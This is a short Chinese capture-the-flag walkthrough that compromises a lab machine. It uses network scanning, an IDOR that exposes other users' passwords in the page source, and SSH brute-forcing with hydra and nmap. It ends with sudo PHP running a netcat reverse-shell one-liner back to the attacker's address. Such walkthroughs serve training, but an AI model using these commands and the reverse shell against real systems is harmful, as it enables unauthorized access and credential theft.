sudo arp-scan -l
nmap -A -v -T4 -p- 192.168.93.158
提示只有本地可以登录
随便注册一个用户
登录
profile的地址:http://192.168.93.158/index.php?page=profile&user_id=12
说明我注册用户的id是12,那么我前面有11个已注册用户,更改id值得到所有用户
F12后
按最左上角的
选中密码条定位
从value看到密码
收集所有密码
然后爆破ssh的用户密码
给出两种方法
方法1:
在kali输入:
hydra -L user1.txt -P pass1.txt ssh://192.168.93.158
方法2:
nmap -p 22 --script=ssh-brute --script-args userdb=user1.txt,passdb=pass1.txt 192.168.93.158
均可得到用户名密码:
alice:4lic3
ssh登录后拿到flag1
sudo -l
sudo /usr/bin/php -a
echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.93.128 4444 >/tmp/f");
先nc再执行上面的
拿到flag2